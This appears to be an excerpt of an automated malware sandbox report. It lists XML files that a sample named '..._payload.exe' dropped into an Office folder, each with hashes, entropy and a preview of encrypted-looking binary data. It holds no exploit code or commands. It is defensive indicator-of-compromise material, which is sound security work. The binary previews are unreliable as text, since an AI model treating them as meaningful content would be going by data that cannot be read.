                                                                                                                          SHA-256:518E080E042ECCE012427E60ABFEDBA8797D95A7162C972A856333F79B486BFA
                                                                                                                          SHA-512:45AFF61D28832FC0E76FFB602F67EB8B22BF6ACF255DCCC5949814617E434820C556DA96A57B5B9109D00FFCA9E91F436CB130AD1568B1C24E1231F1507565F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.I*&52V&s.1AS.......?..]..,...u.gAD.ao..t.H{3....*.`....o6G...s8.Q.0...<w.?...^....._.y.b1y...pz....B._8lw.....?....X-.~.0......L....e.._....s....(........tM........^..0..B.....=...:%....Qk.X2....=..........U.3.=.....P(....>.~..{......S.....3L..[.%..A.7....4...T..Gs....RV.!.._.<....1...3ycT8.NU.....7....."..C.6<.P{..L.&a...?.[.=....kq...c.f:&...U........m..V.D....0*k..W....-#P...I....U.>,.E.T.K.rq.a.1.Ep..s.C...z...b....9.lmt...r....2.]....L....ZNq...G...v...%.Z.O...-p......i....'....:....;-....:A.a.P..HD.2..,M^.Yb....9..F.v.$......c.ja.. ...=................{GB..)..|Q.V8......<............W.k.0..._........`9.e.....*A..*.......{...u...........'.~..J....!$..r.......5P..U...s.p...o.}.;`....S&..H..=...Vb.......#..Y>9m.\.......t7..I...S....BO.I..I.|1.....xu....'.je.p!...}n.A.....#-.C..v...af......?.lq..L.p;.....%.d...oL9..x.~../Y..H3MQ=.....).........h.....I,uz.fK.&!2#U..[......I~..w.WJ.zk.d+S.D.w.D.0$...a./+.6.y......E.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11370v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1001
                                                                                                                          Entropy (8bit):7.800406159268104
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:M+uLbPG+EGtEUDbcG77YYQ4RfNmYS12Y1PvRX3712FcjQzgYmVfFyq5bTcii9a:jl+IUzYgPmt2y2FcSkbD
                                                                                                                          MD5:DD909A3E70F9013B547D69296D30A51E
                                                                                                                          SHA1:C58DF966ADC2CED61F7041D015D81826DCA6E144
                                                                                                                          SHA-256:CA8BD7E3CB9AA0D2207C8B4608FA5E870E087FF019FDCCE26C94F4BB498683B9
                                                                                                                          SHA-512:D1ABD335C3D38A119F20F36F464EB7F19FFC23D6C510A06FB5D3CC78F95500B8EF2693EC684B59BC796D2CD516A7A4C7AB31DB5DBFBFA6E673F765522C4BDF4C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml2a;k....R^L.gU.f..e.<&.....dK.......:..%L4......n5./.f..(.`.0P...TI........?t..O.......k#.:........v..t.-+.IF._..x"+..Y.*M...0.*.N.+.....`).=...{2.>}pHmp...f..., .N.d-....O..\.Dc.....Hs..o........../....D,H"<BM..Q........9..s.7..>...D1o...?.....oT...zJ...|..L............~..z...1.6....o...DY.......X..L,_.m'N...P....C..s.;...ae...3..@.....w..6..5...Ee..J.<......X8O].....<'..I.r.:^~.....K.......U.;...QJRR2.7(".)..c.tn.W.1......K.X....1...D..g..a...z......U........l.....N...(...mz.G.....A..S..4E...bqg..W.">...xe..:M...WlSY.....X?......#.*..2)]C.....c$q\.D...~%I.Y_....h.......8)...l].....\.KDd"dx.[....*......."?]..A...Q.3..}t..o......g.sD.Y..?...4-.]...gR.G!.......C...C../...l...xT._.f.(d....S..........Ei.h..?.!..P.k..+O...{.eY/5h.y.|.Z...N....i.F.?.g.d.0...q..WHh..L....@...'.&eK;3(..n.s..M..i....EY...WZ..*_7..u.5...]"....C.....#.wTO..m!e.f.-.n[.F]..f....-E..d.>E.c;/XphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11381v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2743
                                                                                                                          Entropy (8bit):7.922523934027797
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Lq+9qzEw7fNfaodRtHRoN/c00G29SFBrCKabCzJDo8RQfx4fcWsgf/qWUD:bqI89jtHKN/09SFYKaCoFkpf/s
                                                                                                                          MD5:354D62DFE5CBFDA023128F514313C69B
                                                                                                                          SHA1:3D7C2EAF9EE9AC4B540E83FFDA57B1DC7821FA1D
                                                                                                                          SHA-256:AF93777E938F424A94DD0722C77BDE9A052FC118A7DD17628FA528C765EAB892
                                                                                                                          SHA-512:A77BD2ACA27C11A35C0CCC677E3C3580BCC5BCFCD37F0796B0A571FE0D161B48F9390C984EACAD9E315F53AB8B020E7A45E1F5AC50DE2E633BEC4352A84A40D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.4{b.W{...a|.w.H..v:5.&.9{?@...g.j4[..g.>.>r.|..7F..J@..2.Rc.q.....e6.S<.`.[..g.0..7to &....A...?.k.a.3@4y...kVv.P..a[...V..v.....x.....%.q..O..X.-vq.P:.!7..x]y.n.u..y....X............?....`2WL..`.....-w".....R..J....._..p.?.`?v..{.....A.u~^C9S.&..8%...A{.{=aE....Q./V..U.l..O..|.Q...j.K.y.iC.cJQ.@*.&..r....{.U.e$.c.....j.i...U6..U}`.O.i).n....Ftm.]...A.T6....>3*!.U[~.qB}.L..^.4..<... ..,..7..S.E...R..k"d.../]`!~..xn.].......Wd..P..E...>A....l..2.&h.R...OJ}gN4..eX,...WC%............7....q.]....A=....k.R>..\M.....:.SXsrw...m.^.A..d&....v-..K. *.Zz0....s,.n.......1....J.........Z(H.<......6Xr....?.z...@VJ......g.S6.B.....R.....M..tK..Y+........e.zV.o.......O.YU..8.G1\..RA1......-b..9...j.C.r{^y.....Q.5h.X.$".VA... ..W4. ...(..P..O..Mr..#..%N..gd.:u...R..P.*H....4].=.E..}:...y...4.......O.'...`t.I../...W..7. r...b...^ ...k.V..a..c.#..c.28g..].|..e.b..#&..g'.;3. ..TM...2.)..?5..Dk..=".;.f...kT..l.g..m.m...v.......^.#.J^.'.zO......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11446v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11063
                                                                                                                          Entropy (8bit):7.984132670257866
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:EvrYw+ltZ0I70Qjiw4G6hg42H/OTD79+OUzbivQXNWEnDKWqly:EvV+jZ0I1GxHhAaknHLX0EnmWJ
                                                                                                                          MD5:A8A3D9031F989F645E1D5FC3FD80B8B5
                                                                                                                          SHA1:6143734337726A52486D63DEB25997D6AF03A8E1
                                                                                                                          SHA-256:B00F60700D1DBF64F4ECB359F80700BC492916D000569C476D8515A6EE7A2BA7
                                                                                                                          SHA-512:A237542EA30608B1AFA480242C1AA500891A0F65CBF5D34D7FE8ACFD657E341464D28AC8E7B01E102DC3319F67238D7AFE7F9A04A25DD065CB435D6C4077E668
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....O.B...-*..e.9..........Gc97..F|'.3.sz.l.4..gm..1 ..S .!+xE9...s>...c.uc.q....-.L.tP.M~E.........K......}!.....t..g.F\....a... .=NE..dL....e.&P..].x.$..&.]l..&.5.8.\.X.2).o(O..{.w.M.N.....(.p..$F.L..,L.....VW. K...N)yF...{..H...1F..~Wy....|#...]...g....N..#N.M.o.3...dp..PWg*...t...fN.\...T..A.&..8....2...F.(.7..7;\1.dnl..n.C..Bh..%.X{...'.x.S......k....q`Q...d...o.b.......f..K.NXC...@.C6.H_....}hZ.+.UG.^.x...6..l..+...qY...O.s.... ."...E;....I............e,...../..t.....:....{sp...(.....x0...>...5r)..+.{..b.i.pz.^p.$@..L.F..$.C.&`~...J....>."p.n)2...E.Xn_....7 ...t.i...cc.l.....t..d..!.[.....u..>.@._'.-.....D...k..<.4l.&G..y.11.Z.9......(..(..J.d...... ....)R.9[.K>..N.......x.S..D....6Hm.g.......pLxg...........a..R....bYm...R...H.%.6j.<X5.....r..."u...|n!..D.6....R..F..b3.........R1`v..7...G...1 ....q..i.../.*..j.~..%.._.]...e7A=..:.CS).I.....prM..F..I:b6...~..c..y>..X...... m.-..D....S...#.{$....@.a..\.Q

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11464v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):807
                                                                                                                          Entropy (8bit):7.709040351740388
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:rTBTaInatRssERcS3iMNBmKJZ/Ixo1gClbD:rlaSatRAgKj95D
                                                                                                                          MD5:4C4E807ED811260EC18FE426AF4A4FA5
                                                                                                                          SHA1:2BE27218C3DD40485EC862687790AC968B29633A
                                                                                                                          SHA-256:B165834BD52E7467CC21A27E776E2C24E57738DB8E2E81ED6FF7FA2F31FC4C0C
                                                                                                                          SHA-512:779797B69007E5F259778624EF1084B86FF02018C49C09E29D3C567EF1ED8730C04B7B1DE413623CB6DE540A2B87E607C550884B1B8ECD88977B451778F27C64
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlp....0...$..].Ym.....:....... 8KX:.:..=d.y.,{.8{.<,L..h.2l.."r|C.q.P..0.pJK1 >;&.U.<^.}.4..a.n...~..>..;..2E..q.E|T?=.._..5:ATOp...M}{......8b.2]..Z..u.!..H.......M...,...o...L.]..c?..vk.....^...b.V.*6.C...8...b.,v_...{..qkv.......WF`..RP.qp...+D....#K.!).....;%.....NT...I].#...{..}z...*\X.P..4.R..Lt.......S......Y...6..&^bD..j.....A.?..t.=..w.VS|...T..;D4.V....._ ...Yp.R".8X.........X.[..3.......j..Y..%.j.GyV..a...*..Bi.c..qu..7.l....J4,..D..B#]..#.....YV:..`>L.fH...1.F..5.s...`........F.D....}*.5..}.}.E:.D.=Skv_..C....../..`.o..s1/.D..d([..M.'~...H....Z.'L.M.f]H.R../..F....:...k.L.b...x2..k..........+..'P.............";...7.g......?F..$........c....q...w..!.W.R.n.s...9.#5....y.Y)phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11498v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):747
                                                                                                                          Entropy (8bit):7.729317559582037
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:JX3zgh2+1VbdatJDCqJEfqu+Gwl8qjCAQOOCq1cC9O5bZTYn7ruq5bTcii9a:JX3+7TotFC75TwQWOxO5ban7bD
                                                                                                                          MD5:226A6A1F1C8DAEF3FF39ECCFB02C10C2
                                                                                                                          SHA1:FEFE9786CE820F61A21B1D81504AABF77A9F6639
                                                                                                                          SHA-256:6B197C8CC113A1C4577EE8CF9A548AD5A554A1DD86C8D90D4209847151697DFA
                                                                                                                          SHA-512:8BB62397FF32A3DF09043A6435B68308FC295E3EB7AFC6CE7C4487627AF5D99100F40C8CCB445A61AA85D9401FFE43B04A8718CF5C8044A5A823AC9D05305711
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml[a..%.Y.;..@..Q.X.y.NA.F....~..lf.)X..u..Q7...:.[.....k.)...H.4... Mm....J~....q\t.c.Q.^^x.|...f.....4?...|I_ST8.G..k.X......%..8....#.;..9.+...)......T......ZUy.kk.5.....V.:.._......F...M,......1.nf^`....L...U....Y...).j..O?.B..#<......r}...9-....a...\...Sd.78...s.._.5g.04.W6.=..~..$.7..`..2.5.Vx:...,..E.zN.._.G...;..J.{.b...P...T.R].O~Z...5Z.3.@..%....5...Y#..p....SV..(...hU.X.,c.1...9sh.g.J....G.?2..X......J`~/......n.......@...8n.u...r....#..%..B.. ..\..8.......S..EO.o.i... .....3.G..g.4 .............Kx...H...._V....... .fVFK.W..`.G..i..=....&......r..w..K..n.E.....H.qT.W..f...4P.LV.IF..T.aZ.F:.*..I.T.=x.vtO|+.B..[...8phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11499v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1786
                                                                                                                          Entropy (8bit):7.88217624359246
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:b/sSlyknwPZx8nrGaUbVBQK1EyjbGNg5HuD:D7yuwPQn6acgK1MyhW
                                                                                                                          MD5:A83F29C285F0747776148ACA38CF4EA4
                                                                                                                          SHA1:1A9C6909065B8DF0D487BD1ED16923AE5A4C2BB2
                                                                                                                          SHA-256:D83B0A8534A881904FD50B4ABB3112F08DBDA3EB3BCEDB5C525DB07A42FA7094
                                                                                                                          SHA-512:1DDE29ACE63A694024CD4FF59E9540FC3A87C8C6877B128D514EE150CDEBE11AFF2A2272B413D56C8CCBF0A4D2B3A65A867B8E815A267BA320F5BC8297D57937
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlt...<{'.....").W...XB..x.H;?..k.zW.$.uv......f[.....3..:9...c....`2k.m.#.oe.H..e9....$j..E....B.Pi.rz..2J./<....K. .t...Fe...i.lc.h..U..D...G@.dNC.P.r'x.0]r.6..Vq.M;e.u~..a......?2..8..vE..%S.....g.....e.9..1.v.$..c.).......6.j....Y.TP......2.......p.;..I(..4i@$!.*..w.v..0......I...+K2...);...|Q..'%c......Z....*.*TaP...-.H.XV{..@ic~..c.[Lc|......B.R..F.....!.?L...^..[Wa*t#...l1.t$...Z.....u.R.I..:.l.L......l..y.wT.a2.".......N...^.m.....i#'..q...u.W..%..~.^...V[....+f.....;J......l..'ytR...i..=.........h.H.8.X...@.h.VKmYd.!....8... IJ<.......y..@.=...3.$....u..&..=2.\.a..Qj3&..K..'.....3`5A=..O.......2.t....K..n..,.......3J...dT..W{.S....%.}.......}Cl........1...T.'%...n.....0..A8...7....Fin.gD....Fz.$1/Dn..D...."P|P.m.!.".P.baE.G$cnhBA.l4..!r0N.H[..k.`5O?.wfwJ.k...=....i@.........1.K..=|G...s..WWI.N7@..i....V?.....,X7bj*..\1.wh....|:xM.9..U..P/...<.b.....J_.m..b......g.....Z1.^.....4.d..4.3]....F..r.E...:..xGu....0.. 4...G...j.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11500v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):886
                                                                                                                          Entropy (8bit):7.7509538322561315
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:E8siydrNzD2qnXRfNHVIa6RsOduwOGvSloVy6IyaU0mibD:jcNzDPvHVPXwOGvxy6IFmwD
                                                                                                                          MD5:472AD5E18189C2B534FABECDEB65AFEB
                                                                                                                          SHA1:653D5AD95D2B2810DA7AE57754E0B3E71FB4232E
                                                                                                                          SHA-256:CBE31FDE09A98F9AE8D50AD3C2E2860C6F43CFFC70F98D3136FC85656DFB033F
                                                                                                                          SHA-512:DB487E6EBCCC50883310571C38795B11C5347EA2287D7F1B5BA98E14FEB2E05D740AAB9E0E81180BECA975D090201ADA3BB43F12FB72EEA82FCCBC78E8DC9B81
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Vi.f.f.f...[.?.U.y.k.(.G..:.;.UJo.jI.,.j.....C..f0.SC...../....^F.........*Y....Z.....?...G.z..Pf.....m............M.e.....1..:'......\........v..>.0..L.s.......-m.W.&8|'oz....`..".}.?}...K..0.~>..9..}C.c.'....f..q...5..T3.Q.../{f.^...e.....FZ!.jZ.]..vC..........L...Fc...c...c63.^...N..k..?...O!.cY.......Y.....S.Zv.x]q?mNJ\...kO^5..5.R.../.*..h#-...*J4.D.[(..ow..K....j.....o..&....N|....8e....@S,.B.....p.W...A".!H.Yf,k$.~..m&]cR=5..I..F.k.$.....?..5.3....H..f_...=..#.......+...R...C...../?U.c.d....p.62$...7......7....H.........i.?._..n@.eQ.T|...zU<.:._..<z.LF...bT...aU.R{.T..]..BT+.g..T.....R.'......Ku.<..-..=..|..r..X._g....y......(...gG.G.A.gW.&.XG|f'6.t..~....~pk...&..D0.h$..$.).Q..NK..4.3.I.Pyx.9P......FG.:.@..GX...../U.......{7.....ZGm...U..k.h.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11502v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1324
                                                                                                                          Entropy (8bit):7.828256351611467
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Do2dROD0C4R1HhcfRI/X8LhbjPDafV5aaPNdZsCpMLHTlIL98bGsCbD:D1y0C41cfRIP8Nad5aa1dahA98boD
                                                                                                                          MD5:6AC4DC11D627332525AF5FC89FF997C5
                                                                                                                          SHA1:4E0535CD14616CCAEEE0433B7E773B8CEA54D60F
                                                                                                                          SHA-256:8A4AEAFE262E8972B5EE66A7C257B00F4A5C50C1D5FA879C110981AF9F5C9D53
                                                                                                                          SHA-512:7C61CCC5EF2A96307E1FF747ADE1F6C5FE4D346B13A5597386E32080D556318C4B00D31078D7E1E61D404685A458922FA3A1F80C7B61457177FB0C45C0244502
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml. ..6...:s.;.<...e.].%#..gN...qo.W..V.xMl!....$...zO ....4...t..\./..2d......4W...,.....hV..lL2V..;..f].2.~+.z,.....5.3.-.]-9;.qQ...B..~)...[F...<.q.-.04..f.....?4...o?..=K.^.:..,....k..1.....*.i...|.3$.)..x.pc....;k....F...(....4..Ol.....l9Tn.1.`\..%+y....:..'....'....*.x..o.~..B7.>...:y.?...Y..uBK.......dD."..r.\...X..D......cR....8<Q....q6..R......:.i.2.t.u..<T/.....:.*.....&0.7...j....{...!=.._..gA@UyTU.X..G....hPaB..V....wv..h.].5}_uw`.....t.....i....c.../..CS..M..tkg.V..6..B[@c9A....h.&.R..vO 4I......-.."....\...D. ...l..7./Aa.*.....E.4..6=.).X.!.,..:....Hv.Qt.. .W.R.V........J.5.0[.#...I..V.hK.q.:..;..}:.7.j.).R..*A{.#.(..B...9.i...P..S ..Gu......J...{.+........\....!.<9...z.I..p!./..E..p~..l{..o-...A.y=...e.p.....A...>y.s.IrR.b.........d.$.L:....=..>.......@...f..c.&qA..........W1..nD...&..V2..s......rr..5..=....P8.,..+.6....K3.(.~&3...f.N..U.(.G.=...8S..j4...Wt->..|..,Vqn..9$.n.rd.<hs..I..\.$....Jd>`l.%.q?.[.c...}|!..L....f

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11504v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1435
                                                                                                                          Entropy (8bit):7.845351848989268
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SnOPIDlUXU5ZkICgFn3HC5xPF23LrkrboXUpoSXiH7T5AZrvls4en/dMzM2F+YbD:aOPICXCtCiygKUBSXYTqvl2n/e/F+CD
                                                                                                                          MD5:5E2E8DD13ACB674E6DE07788A74882CF
                                                                                                                          SHA1:E39F4B4AD1D932716776F72D3EF061350D62CCF2
                                                                                                                          SHA-256:7B59E7001C38D560405C7A3BD75DABE078EF710F011D5A7E71D1CE01E1E7367F
                                                                                                                          SHA-512:66DFBA5BDADB246362A296B9E1BE69D7EA6CAEAC51FAA091738BA4F0454B760011C02A44E8AC4E175B7B37A185D05198908D0C8C03A2A446E6F28A5A86E18A51
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..C^....v.......k(...hv.u.s........s.f.......`.8........K..:...)..#.'.........j{...0(...2..Q.....2.9.......b.....Msf6."..Yi2.d.@.#...kg.....?.H.J..a.M..+..}.....FB.>.bcY.N?...Y...,..j..'.M.yt.k1(Gt>...9N%f..K.7.P'.(.M. 5s.h.......U..E<.h.....'...1u<.B.^.;)8=.V....<.....S..T..v...l..aQa..Np...c.pR..N.o..*.Y.My*'..T&h...va.....K..>kx...r..QA....CL.u..8..8....N...H.......d...{r,...4..8pu.rrX.<.J.k.W.{..z.=bP..;....<...8....b,O;]..R......'o...........u..$.-n....a.....?.a......+WXE.."S@...C.mv.....tR&\...:d.....z...`.....aw.o......R.........Yf.W..$...T .m.~..Y...Rz.C.\.v...z..Vs.7.r...SF2,.....PT...5.w.'.w.".. .n..~.p.?n...B_.:.,..'.g.".-...&.B......n..p..r.......hVhG.h.h9...Mc.u... ..;.7....x.$..sl.'...U....z.gf.QT.0...rcY.#......o.0......Qy...._..[.J.. .B.OA.1.^.k..k.Q...8D.S.0~.t...e..IpbCs..T..J...8"..vVv..+~;.../o..}.).n!g.m....D...Y...b.;..YTc..../...M.5....nb.U.t.HMH.......N...<Lb...*cb.".[.c.8.w..Z....B./,"u..HI...|.g....B

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11514v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7119
                                                                                                                          Entropy (8bit):7.975758390021822
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:gn5MupkNKx1inJM5JP+nFDCtvae752R1SoLYy6Vjw9OiyDBa3XaRF+:gh1inJMjkctvCzSM6lWMii+
                                                                                                                          MD5:940CE474856F31579B10949ED095EDF8
                                                                                                                          SHA1:E51F167850ED987958750E5932B4B3A544E3D8B0
                                                                                                                          SHA-256:4CBAB7E255F0DAAE8B8AEB16180B7947C1FD0049A8585276B23A36A21290AEC2
                                                                                                                          SHA-512:79AF6B86A79E0BE8D40F5A69B6B5D22CF92AC5B8979889CE4DCFE52471409C98377D571B6DDC5BE3470BF8C21CB90460619D94D13DC1211334084C1FDE3699F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlz"7.....;..."....v&...9......Z..?...m..A+.......L....aN$.....bA.'........:..9.A..z.S. .....}8..'.MO...U..O..4..2...%7.|_....Q..>..8.....Q..}.B-D..p....c.{qp.d.n...q..j.....2.A.g1....,$....@...t....c<..y.<z1.....7I..w.xH..q.....2.,)...%.4...j0...M..~..4. k#_...R.(.C.D...Z.m......=p....f...>8........;.9(....+...X..ti.@..2.x....1D.-.x.\E...K..1.97x........h..r .i.t.MvG>....f..S.3}.....w....%e...8bI......f.r@...I.4...79....:.........\.......?....O.e..SC.xO.. .O../]|64....%..c.g46.....J....q.._>..(Ed.T|JlAT...:%..GO...O....}z7...c~..D9.Gs....'%.y.eI....4.t#.L..p.a5..q.....HR.].<..D...=P.... F.H?..!x...)Q....p.a.kkUa.-.....g3....c..b.*..splD.A].#_......j.d.]..#.C..3.._).z.....<...fh.....p...3&.R..R....z....6.....fPf.%..S...n2..S.......~..p.^..\d.B...B.,\..n....\...[.D.g...=..C..c..f.if..ms,.g..#.-L..'........e.Cs>D.}.I_U.|.p..../..X~.sDD.)<...I..F.....Z.l..R9....f.K.]....[.|.....z..>=.%{(3...82.....f.{7.....m..q...^...Qt....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11659v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):762
                                                                                                                          Entropy (8bit):7.686762397725951
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:jY1H81fsQduTHot7n+GfbJIxYno3O0tIiRECwg/2R233/RN4n/C8g0SpiFgqBEzU:j0k0quTItr12Y+Vhwq6ilhU7WGbD
                                                                                                                          MD5:FAD9CD10F166B1DD4E13194B58B5D7E5
                                                                                                                          SHA1:E9CDA7D80DBDDAAED1E584639BAB96E36026DF55
                                                                                                                          SHA-256:910B91D9C8339FFECFB8C3C15BA9A81506D7A82BA7F93B7869137EF3185F6BFE
                                                                                                                          SHA-512:7DE906B1ED298F631CA18646856AAD515E4644F9FEA4EF6232BDB771CBAA2857AE94FAA5B14048ABC35D2A3045AC52B2C3BD0CAB773E13BD40DC1FB13894423E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml?..]...8..WR..~.l......\......lb......Cneo.p..p......m......{'j.+.a.=yo...U.q..Z....+.?..Do..BB..7X.Z#Y.....?d]...TW.g..*.F..fPA..P.0....p.,vNf.....U...>,....C..0[E.#....l..J...Lm......~.bG.I.d. ]........s.Tz.Z.>.).EQ.......iP...(.x..|........5F}O..t.X..r....=.\...Q!p...M.(...}?.........rC....?9T..D\.....1...D.F..a...T@>..!.&.jO.T&.GF..R....h..2|.n+....jp....O...<....R..J.Z.n..1B...o.&...r.....E.%r.j.....X.n.../..f.x........Zt...+o..D...zS......mj..I....nB.S..s..v#V...g%...f.I.VS.v....b@.....P....y..*.+#q.g.AN..`...X...B'.aH$;Pf...UH.....l.=E..{x..g.^,uF.i...<S..y_.h.......wL..{.=..k.-....f..VC.Bs.h6w..d4...bi..D$G|...v.y..u./..tydp.....sphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11701v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1463
                                                                                                                          Entropy (8bit):7.844403066135116
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Vvx+H/D6MDx197uLfM52YUJ78szWO+3TsslEFS80EoR2fv3c9xj0UHZaOBbD:dx+z7uLU5678sIT9EOEfv3cjIU5aORD
                                                                                                                          MD5:448BF08F14AA2CBE9E18B37370F26CFD
                                                                                                                          SHA1:37E33DB09DEC6BBE4377BE3EC76867C1418B3511
                                                                                                                          SHA-256:B6646C0D3B67D3330DA0088724FD83F5E4F5982E92DD26CC69C1D10F678F52A7
                                                                                                                          SHA-512:26BEA70E63693FC4C9EAF77F494B442CE5AF8566884AE9C0040841ACB5880437DB853AB4D51C02F192C95A162E78D7BC22791F0EEB156368E00850CC7DCE080F
                                                                                                                          Malicious:false
